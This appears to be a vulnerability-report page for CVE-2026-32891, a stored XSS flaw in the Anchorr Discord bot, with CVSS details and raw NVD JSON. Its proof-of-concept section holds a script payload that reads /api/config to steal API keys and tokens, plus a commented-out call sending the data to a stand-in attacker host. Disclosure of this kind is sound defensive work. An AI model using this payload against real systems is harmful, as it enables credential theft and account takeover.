Security Vulnerability Report
中文
CVE-2026-32891 CVSS 9.0 CRITICAL

CVE-2026-32891

Published: 2026-03-20 03:16:00
Last Modified: 2026-03-27 16:09:55
Source: [email protected]

Description

Anchorr is a Discord bot for requesting movies and TV shows and receiving notifications when items are added to a media server. Versions 1.4.1 and below contain a stored XSS vulnerability in the Jellyseerr user selector. Jellyseerr allows any account holder to execute arbitrary JavaScript in the Anchorr admin's browser session. The injected script calls the authenticated /api/config endpoint - which returns the full application configuration in plaintext. This allows the attacker to forge a valid Anchorr session token and gain full admin access to the dashboard with no knowledge of the admin password. The same response also exposes the API keys and tokens for every integrated service, resulting in simultaneous account takeover of the Jellyfin media server (via JELLYFIN_API_KEY), the Jellyseerr request manager (via JELLYSEERR_API_KEY), and the Discord bot (via DISCORD_TOKEN). This issue has been fixed in version 1.4.2.

CVSS Details

CVSS Score
9.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:openvessl:anchorr:*:*:*:*:*:*:*:* - VULNERABLE
Anchorr <= 1.4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- Proof of Concept for CVE-2026-32891 Stored XSS --> <!-- Malicious payload injected into Jellyseerr user selector --> <script> // This script executes in the admin's browser context (function() { // Fetch sensitive configuration from the internal API fetch('/api/config') .then(response => response.json()) .then(data => { // Exfiltrate the stolen configuration (API keys, tokens) // In a real attack, data is sent to an attacker-controlled server console.log('[+] Exfiltrated Config:', JSON.stringify(data)); // Example exfiltration: // fetch('https://attacker-server.com/collect', { // method: 'POST', // body: JSON.stringify(data) // }); }) .catch(err => console.error(err)); })(); </script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32891", "sourceIdentifier": "[email protected]", "published": "2026-03-20T03:16:00.240", "lastModified": "2026-03-27T16:09:54.573", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Anchorr is a Discord bot for requesting movies and TV shows and receiving notifications when items are added to a media server. Versions 1.4.1 and below contain a stored XSS vulnerability in the Jellyseerr user selector. Jellyseerr allows any account holder to execute arbitrary JavaScript in the Anchorr admin's browser session. The injected script calls the authenticated /api/config endpoint - which returns the full application configuration in plaintext. This allows the attacker to forge a valid Anchorr session token and gain full admin access to the dashboard with no knowledge of the admin password. The same response also exposes the API keys and tokens for every integrated service, resulting in simultaneous account takeover of the Jellyfin media server (via JELLYFIN_API_KEY), the Jellyseerr request manager (via JELLYSEERR_API_KEY), and the Discord bot (via DISCORD_TOKEN). This issue has been fixed in version 1.4.2."}, {"lang": "es", "value": "Anchorr es un bot de Discord para solicitar películas y programas de TV y recibir notificaciones cuando se añaden elementos a un servidor de medios. Las versiones 1.4.1 e inferiores contienen una vulnerabilidad XSS almacenada en el selector de usuario de Jellyseerr. Jellyseerr permite a cualquier titular de cuenta ejecutar JavaScript arbitrario en la sesión del navegador del administrador de Anchorr. El script inyectado llama al endpoint autenticado /api/config - que devuelve la configuración completa de la aplicación en texto plano. Esto permite al atacante forjar un token de sesión de Anchorr válido y obtener acceso de administrador completo al panel de control sin conocimiento de la contraseña de administrador. La misma respuesta también expone las claves API y los tokens para cada servicio integrado, lo que resulta en la toma de control simultánea de la cuenta del servidor de medios Jellyfin (a través de JELLYFIN_API_KEY), del gestor de solicitudes Jellyseerr (a través de JELLYSEERR_API_KEY), y del bot de Discord (a través de DISCORD_TOKEN). Este problema ha sido solucionado en la versión 1.4.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-80"}, {"lang": "en", "value": "CWE-212"}, {"lang": "en", "value": "CWE-311"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openvessl:anchorr:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.4.1", "matchCriteriaId": "584CDEBF-7E62-4732-A6FD-64B3384C3834"}]}]}], "references": [{"url": "https://github.com/openVESSL/Anchorr/releases/tag/v1.4.2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/openVESSL/Anchorr/security/advisories/GHSA-6mg4-788h-7g9g", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/openVESSL/Anchorr/security/advisories/GHSA-6mg4-788h-7g9g", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.